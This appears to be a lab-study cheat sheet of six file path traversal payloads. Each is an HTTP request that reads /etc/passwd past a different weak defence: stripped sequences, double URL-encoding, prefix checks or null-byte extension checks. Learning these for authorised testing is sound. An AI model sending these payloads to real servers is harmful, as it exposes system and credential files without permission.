##### File Path Traversal – Simple case ```http GET /product?filename=../../../etc/passwd HTTP/1.1 ``` **Context:** Filename passed as query parameter used to load local files **Encoding:** None **Source:** [[1. File path traversal, simple case]] --- ##### File Path Traversal – Absolute path used (traversal sequences blocked) ```http GET /product?filename=/etc/passwd HTTP/1.1 ``` **Context:** `filename` parameter used without traversal support, but allows absolute paths from server root **Encoding:** None **Source:** [[2. File path traversal, traversal sequences blocked with absolute path bypass]] --- ##### File Path Traversal – Traversal sequences stripped non-recursively ```http GET /product?filename=....//....//....//etc/passwd HTTP/1.1 ``` **Context:** Application strips `../` sequences but does not recursively sanitize malformed traversal patterns **Encoding:** None **Source:** [[3. File path traversal, traversal sequences stripped non-recursively]] --- ##### File Path Traversal – Traversal sequences stripped with superfluous URL-decode ```http GET /product?filename=..%252f..%252f..%252fetc/passwd HTTP/1.1 ``` **Context:** Application filters traversal patterns before decoding input, allowing double-encoded traversal to bypass filters **Encoding:** Double URL-encoded (`%252f` → decoded to `%2f` → `/`) **Source:** [[4. File path traversal, traversal sequences stripped with superfluous URL-decode]] --- ##### File Path Traversal – Weak prefix validation bypass ```http GET /image?filename=/var/www/images/../../../etc/passwd HTTP/1.1 ``` **Context:** Application checks that `filename` **starts with** `/var/www/images/`, but does not normalize the path before access **Encoding:** None **Source:** [[5. File path traversal, validation of start of path]] --- ##### File Path Traversal – File extension validation bypass via null byte injection ```http GET /product?filename=../../../etc/passwd%00.png HTTP/1.1 Host: vulnerable-website.com ``` **Context:** Application enforces that `filename` ends in `.png`, but uses null byte–vulnerable string handling **Encoding:** Null byte encoded as `%00` **Source:** [[6. File path traversal, validation of file extension with null byte bypass]]